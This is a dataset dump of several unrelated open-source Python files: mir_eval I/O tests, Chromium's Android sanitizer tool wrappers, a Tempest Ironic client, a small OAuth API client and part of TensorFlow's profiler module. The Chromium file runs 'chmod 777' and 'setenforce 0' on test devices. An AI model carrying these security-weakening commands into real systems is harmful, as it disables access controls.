| mit | -4,609,561,843,033,304,600 | 36.681529 | 147 | 0.560176 | false |
faroit/mir_eval | tests/test_input_output.py | 3 | 6414 | """ Unit tests for input/output functions """
import numpy as np
import json
import mir_eval
import warnings
import nose.tools
import tempfile
def test_load_delimited():
# Test for ValueError when a non-string or file handle is passed
nose.tools.assert_raises(
IOError, mir_eval.io.load_delimited, None, [int])
# Test for a value error when the wrong number of columns is passed
with tempfile.TemporaryFile('r+') as f:
f.write('10 20')
f.seek(0)
nose.tools.assert_raises(
ValueError, mir_eval.io.load_delimited, f, [int, int, int])
# Test for a value error on conversion failure
with tempfile.TemporaryFile('r+') as f:
f.write('10 a 30')
f.seek(0)
nose.tools.assert_raises(
ValueError, mir_eval.io.load_delimited, f, [int, int, int])
def test_load_events():
# Test for a warning when invalid events are supplied
with tempfile.TemporaryFile('r+') as f:
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always')
# Non-increasing is invalid
f.write('10\n9')
f.seek(0)
events = mir_eval.io.load_events(f)
assert len(w) == 1
assert issubclass(w[-1].category, UserWarning)
assert (str(w[-1].message) ==
'Events should be in increasing order.')
# Make sure events were read in correctly
assert np.all(events == [10, 9])
def test_load_labeled_events():
# Test for a value error when invalid labeled events are supplied
with tempfile.TemporaryFile('r+') as f:
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always')
# Non-increasing is invalid
f.write('10 a\n9 b')
f.seek(0)
events, labels = mir_eval.io.load_labeled_events(f)
assert len(w) == 1
assert issubclass(w[-1].category, UserWarning)
assert (str(w[-1].message) ==
'Events should be in increasing order.')
# Make sure events were read in correctly
assert np.all(events == [10, 9])
# Make sure labels were read in correctly
assert labels == ['a', 'b']
def test_load_intervals():
# Test for a value error when invalid labeled events are supplied
with tempfile.TemporaryFile('r+') as f:
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always')
# Non-increasing is invalid
f.write('10 9\n9 10')
f.seek(0)
intervals = mir_eval.io.load_intervals(f)
assert len(w) == 1
assert issubclass(w[-1].category, UserWarning)
assert (str(w[-1].message) ==
'All interval durations must be strictly positive')
# Make sure intervals were read in correctly
assert np.all(intervals == [[10, 9], [9, 10]])
def test_load_labeled_intervals():
# Test for a value error when invalid labeled events are supplied
with tempfile.TemporaryFile('r+') as f:
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always')
# Non-increasing is invalid
f.write('10 9 a\n9 10 b')
f.seek(0)
intervals, labels = mir_eval.io.load_labeled_intervals(f)
assert len(w) == 1
assert issubclass(w[-1].category, UserWarning)
assert (str(w[-1].message) ==
'All interval durations must be strictly positive')
# Make sure intervals were read in correctly
assert np.all(intervals == [[10, 9], [9, 10]])
assert labels == ['a', 'b']
def test_load_valued_intervals():
# Test for a value error when invalid valued events are supplied
with tempfile.TemporaryFile('r+') as f:
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always')
# Non-increasing is invalid
f.write('10 9 5\n9 10 6')
f.seek(0)
intervals, values = mir_eval.io.load_valued_intervals(f)
assert len(w) == 1
assert issubclass(w[-1].category, UserWarning)
assert (str(w[-1].message) ==
'All interval durations must be strictly positive')
# Make sure intervals were read in correctly
assert np.all(intervals == [[10, 9], [9, 10]])
assert np.all(values == [5, 6])
def test_load_ragged_time_series():
# Test for ValueError when a non-string or file handle is passed
nose.tools.assert_raises(
IOError, mir_eval.io.load_ragged_time_series, None, float,
header=False)
# Test for a value error on conversion failure
with tempfile.TemporaryFile('r+') as f:
f.write('10 a 30')
f.seek(0)
nose.tools.assert_raises(
ValueError, mir_eval.io.load_ragged_time_series, f, float,
header=False)
# Test for a value error on invalid time stamp
with tempfile.TemporaryFile('r+') as f:
f.write('a 10 30')
f.seek(0)
nose.tools.assert_raises(
ValueError, mir_eval.io.load_ragged_time_series, f, int,
header=False)
# Test for a value error on invalid time stamp with header
with tempfile.TemporaryFile('r+') as f:
f.write('x y z\na 10 30')
f.seek(0)
nose.tools.assert_raises(
ValueError, mir_eval.io.load_ragged_time_series, f, int,
header=True)
def test_load_tempo():
# Test the tempo loader
tempi, weight = mir_eval.io.load_tempo('data/tempo/ref01.lab')
assert np.allclose(tempi, [60, 120])
assert weight == 0.5
@nose.tools.raises(ValueError)
def test_load_tempo_multiline():
tempi, weight = mir_eval.io.load_tempo('data/tempo/bad00.lab')
@nose.tools.raises(ValueError)
def test_load_tempo_badweight():
tempi, weight = mir_eval.io.load_tempo('data/tempo/bad01.lab')
def test_load_bad_tempi():
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always')
tempi, weight = mir_eval.io.load_tempo('data/tempo/bad02.lab')
assert len(w) == 1
assert issubclass(w[-1].category, UserWarning)
assert ('non-negative numbers' in str(w[-1].message))
| mit | -406,221,146,304,703,940 | 36.075145 | 71 | 0.597287 | false |
Omegaphora/external_chromium_org | build/android/pylib/valgrind_tools.py | 32 | 8645 | # Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Classes in this file define additional actions that need to be taken to run a
test under some kind of runtime error detection tool.
The interface is intended to be used as follows.
1. For tests that simply run a native process (i.e. no activity is spawned):
Call tool.CopyFiles().
Prepend test command line with tool.GetTestWrapper().
2. For tests that spawn an activity:
Call tool.CopyFiles().
Call tool.SetupEnvironment().
Run the test as usual.
Call tool.CleanUpEnvironment().
"""
# pylint: disable=R0201
import glob
import logging
import os.path
import subprocess
import sys
from pylib.constants import DIR_SOURCE_ROOT
from pylib.device import device_errors
def SetChromeTimeoutScale(device, scale):
"""Sets the timeout scale in /data/local/tmp/chrome_timeout_scale to scale."""
path = '/data/local/tmp/chrome_timeout_scale'
if not scale or scale == 1.0:
# Delete if scale is None/0.0/1.0 since the default timeout scale is 1.0
device.RunShellCommand('rm %s' % path)
else:
device.WriteFile(path, '%f' % scale, as_root=True)
class BaseTool(object):
"""A tool that does nothing."""
def __init__(self):
"""Does nothing."""
pass
def GetTestWrapper(self):
"""Returns a string that is to be prepended to the test command line."""
return ''
def GetUtilWrapper(self):
"""Returns the wrapper name for the utilities.
Returns:
A string that is to be prepended to the command line of utility
processes (forwarder, etc.).
"""
return ''
def CopyFiles(self):
"""Copies tool-specific files to the device, create directories, etc."""
pass
def SetupEnvironment(self):
"""Sets up the system environment for a test.
This is a good place to set system properties.
"""
pass
def CleanUpEnvironment(self):
"""Cleans up environment."""
pass
def GetTimeoutScale(self):
"""Returns a multiplier that should be applied to timeout values."""
return 1.0
def NeedsDebugInfo(self):
"""Whether this tool requires debug info.
Returns:
True if this tool can not work with stripped binaries.
"""
return False
class AddressSanitizerTool(BaseTool):
"""AddressSanitizer tool."""
WRAPPER_NAME = '/system/bin/asanwrapper'
# Disable memcmp overlap check.There are blobs (gl drivers)
# on some android devices that use memcmp on overlapping regions,
# nothing we can do about that.
EXTRA_OPTIONS = 'strict_memcmp=0,use_sigaltstack=1'
def __init__(self, device):
super(AddressSanitizerTool, self).__init__()
self._device = device
# Configure AndroidCommands to run utils (such as md5sum_bin) under ASan.
# This is required because ASan is a compiler-based tool, and md5sum
# includes instrumented code from base.
device.old_interface.SetUtilWrapper(self.GetUtilWrapper())
libs = glob.glob(os.path.join(DIR_SOURCE_ROOT,
'third_party/llvm-build/Release+Asserts/',
'lib/clang/*/lib/linux/',
'libclang_rt.asan-arm-android.so'))
assert len(libs) == 1
self._lib = libs[0]
def CopyFiles(self):
"""Copies ASan tools to the device."""
subprocess.call([os.path.join(DIR_SOURCE_ROOT,
'tools/android/asan/asan_device_setup.sh'),
'--device', str(self._device),
'--lib', self._lib,
'--extra-options', AddressSanitizerTool.EXTRA_OPTIONS])
self._device.WaitUntilFullyBooted()
def GetTestWrapper(self):
return AddressSanitizerTool.WRAPPER_NAME
def GetUtilWrapper(self):
"""Returns the wrapper for utilities, such as forwarder.
AddressSanitizer wrapper must be added to all instrumented binaries,
including forwarder and the like. This can be removed if such binaries
were built without instrumentation. """
return self.GetTestWrapper()
def SetupEnvironment(self):
try:
self._device.EnableRoot()
except device_errors.CommandFailedError as e:
# Try to set the timeout scale anyway.
# TODO(jbudorick) Handle this exception appropriately after interface
# conversions are finished.
logging.error(str(e))
SetChromeTimeoutScale(self._device, self.GetTimeoutScale())
def CleanUpEnvironment(self):
SetChromeTimeoutScale(self._device, None)
def GetTimeoutScale(self):
# Very slow startup.
return 20.0
class ValgrindTool(BaseTool):
"""Base abstract class for Valgrind tools."""
VG_DIR = '/data/local/tmp/valgrind'
VGLOGS_DIR = '/data/local/tmp/vglogs'
def __init__(self, device):
super(ValgrindTool, self).__init__()
self._device = device
# exactly 31 chars, SystemProperties::PROP_NAME_MAX
self._wrap_properties = ['wrap.com.google.android.apps.ch',
'wrap.org.chromium.native_test']
def CopyFiles(self):
"""Copies Valgrind tools to the device."""
self._device.RunShellCommand(
'rm -r %s; mkdir %s' % (ValgrindTool.VG_DIR, ValgrindTool.VG_DIR))
self._device.RunShellCommand(
'rm -r %s; mkdir %s' % (ValgrindTool.VGLOGS_DIR,
ValgrindTool.VGLOGS_DIR))
files = self.GetFilesForTool()
for f in files:
self._device.PushChangedFiles(
os.path.join(DIR_SOURCE_ROOT, f),
os.path.join(ValgrindTool.VG_DIR, os.path.basename(f)))
def SetupEnvironment(self):
"""Sets up device environment."""
self._device.RunShellCommand('chmod 777 /data/local/tmp')
self._device.RunShellCommand('setenforce 0')
for prop in self._wrap_properties:
self._device.RunShellCommand(
'setprop %s "logwrapper %s"' % (prop, self.GetTestWrapper()))
SetChromeTimeoutScale(self._device, self.GetTimeoutScale())
def CleanUpEnvironment(self):
"""Cleans up device environment."""
for prop in self._wrap_properties:
self._device.RunShellCommand('setprop %s ""' % (prop,))
SetChromeTimeoutScale(self._device, None)
def GetFilesForTool(self):
"""Returns a list of file names for the tool."""
raise NotImplementedError()
def NeedsDebugInfo(self):
"""Whether this tool requires debug info.
Returns:
True if this tool can not work with stripped binaries.
"""
return True
class MemcheckTool(ValgrindTool):
"""Memcheck tool."""
def __init__(self, device):
super(MemcheckTool, self).__init__(device)
def GetFilesForTool(self):
"""Returns a list of file names for the tool."""
return ['tools/valgrind/android/vg-chrome-wrapper.sh',
'tools/valgrind/memcheck/suppressions.txt',
'tools/valgrind/memcheck/suppressions_android.txt']
def GetTestWrapper(self):
"""Returns a string that is to be prepended to the test command line."""
return ValgrindTool.VG_DIR + '/' + 'vg-chrome-wrapper.sh'
def GetTimeoutScale(self):
"""Returns a multiplier that should be applied to timeout values."""
return 30
class TSanTool(ValgrindTool):
"""ThreadSanitizer tool. See http://code.google.com/p/data-race-test ."""
def __init__(self, device):
super(TSanTool, self).__init__(device)
def GetFilesForTool(self):
"""Returns a list of file names for the tool."""
return ['tools/valgrind/android/vg-chrome-wrapper-tsan.sh',
'tools/valgrind/tsan/suppressions.txt',
'tools/valgrind/tsan/suppressions_android.txt',
'tools/valgrind/tsan/ignores.txt']
def GetTestWrapper(self):
"""Returns a string that is to be prepended to the test command line."""
return ValgrindTool.VG_DIR + '/' + 'vg-chrome-wrapper-tsan.sh'
def GetTimeoutScale(self):
"""Returns a multiplier that should be applied to timeout values."""
return 30.0
TOOL_REGISTRY = {
'memcheck': MemcheckTool,
'memcheck-renderer': MemcheckTool,
'tsan': TSanTool,
'tsan-renderer': TSanTool,
'asan': AddressSanitizerTool,
}
def CreateTool(tool_name, device):
"""Creates a tool with the specified tool name.
Args:
tool_name: Name of the tool to create.
device: A DeviceUtils instance.
Returns:
A tool for the specified tool_name.
"""
if not tool_name:
return BaseTool()
ctor = TOOL_REGISTRY.get(tool_name)
if ctor:
return ctor(device)
else:
print 'Unknown tool %s, available tools: %s' % (
tool_name, ', '.join(sorted(TOOL_REGISTRY.keys())))
sys.exit(1)
| bsd-3-clause | 681,379,665,412,633,000 | 30.097122 | 80 | 0.666397 | false |
ebagdasa/tempest | tempest/services/baremetal/v1/base_v1.py | 1 | 12325 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest.services.baremetal import base
class BaremetalClientV1(base.BaremetalClient):
"""
Base Tempest REST client for Ironic API v1.
Specific implementations must implement serialize and deserialize
methods in order to send requests to Ironic.
"""
def __init__(self, auth_provider):
super(BaremetalClientV1, self).__init__(auth_provider)
self.version = '1'
self.uri_prefix = 'v%s' % self.version
@base.handle_errors
def list_nodes(self, **kwargs):
"""List all existing nodes."""
return self._list_request('nodes', **kwargs)
@base.handle_errors
def list_chassis(self):
"""List all existing chassis."""
return self._list_request('chassis')
@base.handle_errors
def list_chassis_nodes(self, chassis_uuid):
"""List all nodes associated with a chassis."""
return self._list_request('/chassis/%s/nodes' % chassis_uuid)
@base.handle_errors
def list_ports(self, **kwargs):
"""List all existing ports."""
return self._list_request('ports', **kwargs)
@base.handle_errors
def list_node_ports(self, uuid):
"""List all ports associated with the node."""
return self._list_request('/nodes/%s/ports' % uuid)
@base.handle_errors
def list_nodestates(self, uuid):
"""List all existing states."""
return self._list_request('/nodes/%s/states' % uuid)
@base.handle_errors
def list_ports_detail(self, **kwargs):
"""Details list all existing ports."""
return self._list_request('/ports/detail', **kwargs)
@base.handle_errors
def list_drivers(self):
"""List all existing drivers."""
return self._list_request('drivers')
@base.handle_errors
def show_node(self, uuid):
"""
Gets a specific node.
:param uuid: Unique identifier of the node in UUID format.
:return: Serialized node as a dictionary.
"""
return self._show_request('nodes', uuid)
@base.handle_errors
def show_node_by_instance_uuid(self, instance_uuid):
"""
Gets a node associated with given instance uuid.
:param uuid: Unique identifier of the node in UUID format.
:return: Serialized node as a dictionary.
"""
uri = '/nodes/detail?instance_uuid=%s' % instance_uuid
return self._show_request('nodes',
uuid=None,
uri=uri)
@base.handle_errors
def show_chassis(self, uuid):
"""
Gets a specific chassis.
:param uuid: Unique identifier of the chassis in UUID format.
:return: Serialized chassis as a dictionary.
"""
return self._show_request('chassis', uuid)
@base.handle_errors
def show_port(self, uuid):
"""
Gets a specific port.
:param uuid: Unique identifier of the port in UUID format.
:return: Serialized port as a dictionary.
"""
return self._show_request('ports', uuid)
@base.handle_errors
def show_port_by_address(self, address):
"""
Gets a specific port by address.
:param address: MAC address of the port.
:return: Serialized port as a dictionary.
"""
uri = '/ports/detail?address=%s' % address
return self._show_request('ports', uuid=None, uri=uri)
def show_driver(self, driver_name):
"""
Gets a specific driver.
:param driver_name: Name of driver.
:return: Serialized driver as a dictionary.
"""
return self._show_request('drivers', driver_name)
@base.handle_errors
def create_node(self, chassis_id, **kwargs):
"""
Create a baremetal node with the specified parameters.
:param cpu_arch: CPU architecture of the node. Default: x86_64.
:param cpu_num: Number of CPUs. Default: 8.
:param storage: Disk size. Default: 1024.
:param memory: Available RAM. Default: 4096.
:param driver: Driver name. Default: "fake"
:return: A tuple with the server response and the created node.
"""
node = {'chassis_uuid': chassis_id,
'properties': {'cpu_arch': kwargs.get('cpu_arch', 'x86_64'),
'cpu_num': kwargs.get('cpu_num', 8),
'storage': kwargs.get('storage', 1024),
'memory': kwargs.get('memory', 4096)},
'driver': kwargs.get('driver', 'fake')}
return self._create_request('nodes', 'node', node)
@base.handle_errors
def create_chassis(self, **kwargs):
"""
Create a chassis with the specified parameters.
:param description: The description of the chassis.
Default: test-chassis
:return: A tuple with the server response and the created chassis.
"""
chassis = {'description': kwargs.get('description', 'test-chassis')}
return self._create_request('chassis', 'chassis', chassis)
@base.handle_errors
def create_port(self, node_id, **kwargs):
"""
Create a port with the specified parameters.
:param node_id: The ID of the node which owns the port.
:param address: MAC address of the port.
:param extra: Meta data of the port. Default: {'foo': 'bar'}.
:param uuid: UUID of the port.
:return: A tuple with the server response and the created port.
"""
port = {'extra': kwargs.get('extra', {'foo': 'bar'}),
'uuid': kwargs['uuid']}
if node_id is not None:
port['node_uuid'] = node_id
if kwargs['address'] is not None:
port['address'] = kwargs['address']
return self._create_request('ports', 'port', port)
@base.handle_errors
def delete_node(self, uuid):
"""
Deletes a node having the specified UUID.
:param uuid: The unique identifier of the node.
:return: A tuple with the server response and the response body.
"""
return self._delete_request('nodes', uuid)
@base.handle_errors
def delete_chassis(self, uuid):
"""
Deletes a chassis having the specified UUID.
:param uuid: The unique identifier of the chassis.
:return: A tuple with the server response and the response body.
"""
return self._delete_request('chassis', uuid)
@base.handle_errors
def delete_port(self, uuid):
"""
Deletes a port having the specified UUID.
:param uuid: The unique identifier of the port.
:return: A tuple with the server response and the response body.
"""
return self._delete_request('ports', uuid)
@base.handle_errors
def update_node(self, uuid, **kwargs):
"""
Update the specified node.
:param uuid: The unique identifier of the node.
:return: A tuple with the server response and the updated node.
"""
node_attributes = ('properties/cpu_arch',
'properties/cpu_num',
'properties/storage',
'properties/memory',
'driver',
'instance_uuid')
patch = self._make_patch(node_attributes, **kwargs)
return self._patch_request('nodes', uuid, patch)
@base.handle_errors
def update_chassis(self, uuid, **kwargs):
"""
Update the specified chassis.
:param uuid: The unique identifier of the chassis.
:return: A tuple with the server response and the updated chassis.
"""
chassis_attributes = ('description',)
patch = self._make_patch(chassis_attributes, **kwargs)
return self._patch_request('chassis', uuid, patch)
@base.handle_errors
def update_port(self, uuid, patch):
"""
Update the specified port.
:param uuid: The unique identifier of the port.
:param patch: List of dicts representing json patches.
:return: A tuple with the server response and the updated port.
"""
return self._patch_request('ports', uuid, patch)
@base.handle_errors
def set_node_power_state(self, node_uuid, state):
"""
Set power state of the specified node.
:param node_uuid: The unique identifier of the node.
:state: desired state to set (on/off/reboot).
"""
target = {'target': state}
return self._put_request('nodes/%s/states/power' % node_uuid,
target)
@base.handle_errors
def validate_driver_interface(self, node_uuid):
"""
Get all driver interfaces of a specific node.
:param uuid: Unique identifier of the node in UUID format.
"""
uri = '{pref}/{res}/{uuid}/{postf}'.format(pref=self.uri_prefix,
res='nodes',
uuid=node_uuid,
postf='validate')
return self._show_request('nodes', node_uuid, uri=uri)
@base.handle_errors
def set_node_boot_device(self, node_uuid, boot_device, persistent=False):
"""
Set the boot device of the specified node.
:param node_uuid: The unique identifier of the node.
:param boot_device: The boot device name.
:param persistent: Boolean value. True if the boot device will
persist to all future boots, False if not.
Default: False.
"""
request = {'boot_device': boot_device, 'persistent': persistent}
resp, body = self._put_request('nodes/%s/management/boot_device' %
node_uuid, request)
self.expected_success(204, resp.status)
return body
@base.handle_errors
def get_node_boot_device(self, node_uuid):
"""
Get the current boot device of the specified node.
:param node_uuid: The unique identifier of the node.
"""
path = 'nodes/%s/management/boot_device' % node_uuid
resp, body = self._list_request(path)
self.expected_success(200, resp.status)
return body
@base.handle_errors
def get_node_supported_boot_devices(self, node_uuid):
"""
Get the supported boot devices of the specified node.
:param node_uuid: The unique identifier of the node.
"""
path = 'nodes/%s/management/boot_device/supported' % node_uuid
resp, body = self._list_request(path)
self.expected_success(200, resp.status)
return body
@base.handle_errors
def get_console(self, node_uuid):
"""
Get connection information about the console.
:param node_uuid: Unique identifier of the node in UUID format.
"""
resp, body = self._show_request('nodes/states/console', node_uuid)
self.expected_success(200, resp.status)
return resp, body
@base.handle_errors
def set_console_mode(self, node_uuid, enabled):
"""
Start and stop the node console.
:param node_uuid: Unique identifier of the node in UUID format.
:param enabled: Boolean value; whether to enable or disable the
console.
"""
enabled = {'enabled': enabled}
resp, body = self._put_request('nodes/%s/states/console' % node_uuid,
enabled)
self.expected_success(202, resp.status)
return resp, body
| apache-2.0 | -4,169,565,956,503,638,500 | 31.519789 | 78 | 0.584503 | false |
weapp/miner | publishers/wu_client.py | 1 | 2555 | import urllib, urllib2
import json
class WuClient:
def __init__(self, client_id, client_secret, host="http://localhost:9292", token=None):
self.client_id = client_id
self.client_secret = client_secret
self.host = host
self._build_opener()
self.set_token(token)
self._me = None
def _build_opener(self):
self.opener = urllib2.build_opener()
# opener.addheaders = [('User-agent', 'Mozilla/5.0'),('ACCEPT-ENCODING','gzip;q=1.0,deflate;q=0.6,identity;q=0.3'), ("ACCEPT","*/*")]
def set_token(self, token):
self.token = token
if token:
self.opener.addheaders = [("Authorization", "OAuth %s" % token)]
def auth(self, username, password):
credentials = {
"client_id": self.client_id,
"client_secret": self.client_secret,
"username": username,
"password": password,
"grant_type":"password",
"scope":"read write",
}
# query = urllib.urlencode(credentials)
try:
r = self.open("/oauth/authorize", credentials)
except Exception as e:
print e
return False
self.set_token(r['access_token'])
return True
def open(self, path="/", query=None):
# url = "%s%s" % (self.host, path)
# r = self.opener.open(url, query)
# return json.loads(r.read())
if query:
return self.post(path, query)
else:
return self.get(path)
def get(self, path):
return self._open("GET", path)
def post(self, path, data):
return self._open("POST", path, data)
def put(self, path, data):
return self._open("PUT", path, data)
def _open(self, verb, path, data=None):
# opener = urllib2.build_opener(urllib2.HTTPHandler)
url = "%s%s" % (self.host, path)
if data:
data = urllib.urlencode(data)
request = urllib2.Request(url, data=data)
request.get_method = lambda: verb.upper()
r = self.opener.open(request)
return json.loads(r.read())
def me(self):
if not self._me:
self._me = self.open("/api/me")
return self._me
def user_id(self):
return self.me()["id"]
def new_wu(self, data):
return self.post('/api/wbs', data)
def update_value(self, wu, value):
path = "/api/users/%s/wbs/%s" % (self.user_id(), wu)
return self.put(path, {'data': value})
| mit | -4,071,814,758,759,969,000 | 29.058824 | 141 | 0.540117 | false |
zasdfgbnm/tensorflow | tensorflow/python/profiler/model_analyzer.py | 5 | 15000 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Model Analyzer.
Analyze model, including shape, params, time, memory, structure, etc.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import sys
import six
from google.protobuf import message
from tensorflow.core.profiler import tfprof_options_pb2
from tensorflow.core.profiler import tfprof_output_pb2
from tensorflow.python import pywrap_tensorflow as print_mdl
from tensorflow.python.eager import context
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.profiler import option_builder
from tensorflow.python.profiler import tfprof_logger
from tensorflow.python.util.tf_export import tf_export
_DEFAULT_PROFILE_OPTIONS = 0
_DEFAULT_ADVISE_OPTIONS = 0
# The following options are for 'advise' cmd.
# Show all advice.
ALL_ADVICE = {
'ExpensiveOperationChecker': {},
'AcceleratorUtilizationChecker': {},
'JobChecker': {}, # Only available internally.
'OperationChecker': {},
}
def _graph_string(graph):
"""Helper to serialize a graph to string."""
if graph:
return graph.as_graph_def(add_shapes=True).SerializeToString()
else:
return b''
def _build_options(options):
"""Build tfprof.OptionsProto.
Args:
options: A dictionary of options.
Returns:
tfprof.OptionsProto.
"""
opts = tfprof_options_pb2.OptionsProto()
opts.max_depth = options.get('max_depth', 10)
opts.min_bytes = options.get('min_bytes', 0)
opts.min_peak_bytes = options.get('min_peak_bytes', 0)
opts.min_residual_bytes = options.get('min_residual_bytes', 0)
opts.min_output_bytes = options.get('min_output_bytes', 0)
opts.min_micros = options.get('min_micros', 0)
opts.min_accelerator_micros = options.get('min_accelerator_micros', 0)
opts.min_cpu_micros = options.get('min_cpu_micros', 0)
opts.min_params = options.get('min_params', 0)
opts.min_float_ops = options.get('min_float_ops', 0)
opts.min_occurrence = options.get('min_occurrence', 0)
opts.step = options.get('step', -1)
opts.order_by = options.get('order_by', 'name')
for p in options.get('account_type_regexes', []):
opts.account_type_regexes.append(p)
for p in options.get('start_name_regexes', []):
opts.start_name_regexes.append(p)
for p in options.get('trim_name_regexes', []):
opts.trim_name_regexes.append(p)
for p in options.get('show_name_regexes', []):
opts.show_name_regexes.append(p)
for p in options.get('hide_name_regexes', []):
opts.hide_name_regexes.append(p)
opts.account_displayed_op_only = options.get('account_displayed_op_only',
False)
for p in options.get('select', []):
opts.select.append(p)
opts.output = options.get('output', 'stdout')
opts.dump_to_file = options.get('dump_to_file', '')
return opts
def _build_advisor_options(options):
"""Build tfprof.AdvisorOptionsProto.
Args:
options: A dictionary of options. See ALL_ADVICE example.
Returns:
tfprof.AdvisorOptionsProto.
"""
opts = tfprof_options_pb2.AdvisorOptionsProto()
if options is None:
return opts
for checker, checker_opts in six.iteritems(options):
checker_ops_pb = tfprof_options_pb2.AdvisorOptionsProto.CheckerOption()
for k, v in six.iteritems(checker_opts):
checker_ops_pb[k] = v
opts.checkers[checker].MergeFrom(checker_ops_pb)
return opts
@tf_export('profiler.Profiler')
class Profiler(object):
"""TensorFlow multi-step profiler.
https://github.com/tensorflow/tensorflow/tree/master/tensorflow/core/profiler/README.md
```python
Typical use case:
# Currently we are only allowed to create 1 profiler per process.
profiler = Profiler(sess.graph)
for i in xrange(total_steps):
if i % 10000 == 0:
run_meta = tf.RunMetadata()
_ = sess.run(...,
options=tf.RunOptions(
trace_level=tf.RunOptions.FULL_TRACE),
run_metadata=run_meta)
profiler.add_step(i, run_meta)
# Profile the parameters of your model.
profiler.profile_name_scope(options=(option_builder.ProfileOptionBuilder
.trainable_variables_parameter()))
# Or profile the timing of your model operations.
opts = option_builder.ProfileOptionBuilder.time_and_memory()
profiler.profile_operations(options=opts)
# Or you can generate a timeline:
opts = (option_builder.ProfileOptionBuilder(
option_builder.ProfileOptionBuilder.time_and_memory())
.with_step(i)
.with_timeline_output(filename).build())
profiler.profile_graph(options=opts)
else:
_ = sess.run(...)
# Auto detect problems and generate advice.
profiler.advise()
```
"""
def __init__(self, graph=None, op_log=None):
"""Constructor.
Args:
graph: tf.Graph. If None and eager execution is not enabled, use
default graph.
op_log: optional. tensorflow::tfprof::OpLogProto proto. Used to define
extra op types.
"""
if not graph and context.in_graph_mode():
graph = ops.get_default_graph()
self._coverage = 0.0
self._graph = graph
# pylint: disable=protected-access
op_log = tfprof_logger.merge_default_with_oplog(
self._graph, op_log=op_log)
# pylint: enable=protected-access
print_mdl.NewProfiler(
_graph_string(self._graph), op_log.SerializeToString())
def __del__(self):
print_mdl.DeleteProfiler()
def add_step(self, step, run_meta):
"""Add statistics of a step.
Args:
step: int, An id used to group one or more different `run_meta` together.
When profiling with the profile_xxx APIs, user can use the `step`
id in the `options` to profile these `run_meta` together.
run_meta: RunMetadata proto that contains statistics of a session run.
"""
# pylint: disable=protected-access
op_log = tfprof_logger.merge_default_with_oplog(
self._graph, run_meta=run_meta)
# pylint: enable=protected-access
# TODO(xpan): P1: Better to find the current graph.
self._coverage = print_mdl.AddStep(step, _graph_string(self._graph),
run_meta.SerializeToString(),
op_log.SerializeToString())
def profile_python(self, options):
"""Profile the statistics of the Python codes.
By default, it shows the call stack from root. To avoid
redundant output, you may use options to filter as below
options['show_name_regexes'] = ['.*my_code.py.*']
Args:
options: A dict of options. See core/profiler/g3doc/options.md.
Returns:
a MultiGraphNodeProto that records the results.
"""
opts = _build_options(options)
tfprof_node = tfprof_output_pb2.MultiGraphNodeProto()
try:
tfprof_node.ParseFromString(
print_mdl.Profile('code'.encode('utf-8'), opts.SerializeToString()))
except message.DecodeError as e:
sys.stderr.write('Cannot parse returned proto: %s.\n' % e)
return tfprof_node
def profile_operations(self, options):
"""Profile the statistics of the Operation types (e.g. MatMul, Conv2D).
Args:
options: A dict of options. See core/profiler/g3doc/options.md.
Returns:
a MultiGraphNodeProto that records the results.
"""
opts = _build_options(options)
tfprof_node = tfprof_output_pb2.MultiGraphNodeProto()
try:
tfprof_node.ParseFromString(
print_mdl.Profile('op'.encode('utf-8'), opts.SerializeToString()))
except message.DecodeError as e:
sys.stderr.write('Cannot parse returned proto: %s.\n' % e)
return tfprof_node
def profile_name_scope(self, options):
"""Profile the statistics of graph nodes, organized by name scope.
Args:
options: A dict of options. See core/profiler/g3doc/options.md.
Returns:
a GraphNodeProto that records the results.
"""
opts = _build_options(options)
tfprof_node = tfprof_output_pb2.GraphNodeProto()
try:
tfprof_node.ParseFromString(
print_mdl.Profile('scope'.encode('utf-8'), opts.SerializeToString()))
except message.DecodeError as e:
sys.stderr.write('Cannot parse returned proto: %s.\n' % e)
return tfprof_node
def profile_graph(self, options):
"""Profile the statistics of graph nodes, organized by dataflow graph.
Args:
options: A dict of options. See core/profiler/g3doc/options.md.
Returns:
a GraphNodeProto that records the results.
"""
opts = _build_options(options)
tfprof_node = tfprof_output_pb2.GraphNodeProto()
try:
tfprof_node.ParseFromString(
print_mdl.Profile('graph'.encode('utf-8'), opts.SerializeToString()))
except message.DecodeError as e:
sys.stderr.write('Cannot parse returned proto: %s.\n' % e)
return tfprof_node
def advise(self, options):
"""Automatically detect problems and generate reports.
Args:
options: A dict of options. See ALL_ADVICE example above.
Returns:
A Advise proto that conains the reports from all checkers.
"""
advise_pb = tfprof_output_pb2.AdviceProto()
opts = _build_advisor_options(options)
advise_pb.ParseFromString(
print_mdl.Profile('advise'.encode('utf-8'), opts.SerializeToString()))
return advise_pb
def serialize_to_string(self):
"""Serialize the ProfileProto to a binary string.
Users can write it to file for offline analysis by tfprof commandline
or graphical interface.
Returns:
ProfileProto binary string.
"""
return print_mdl.SerializeToString()
def _write_profile(self, filename):
"""Writes the profile to a file."""
print_mdl.WriteProfile(filename)
@tf_export('profiler.profile')
def profile(graph=None,
run_meta=None,
op_log=None,
cmd='scope',
options=_DEFAULT_PROFILE_OPTIONS):
"""Profile model.
Tutorials and examples can be found in:
https://github.com/tensorflow/tensorflow/tree/master/tensorflow/core/profiler/README.md
Args:
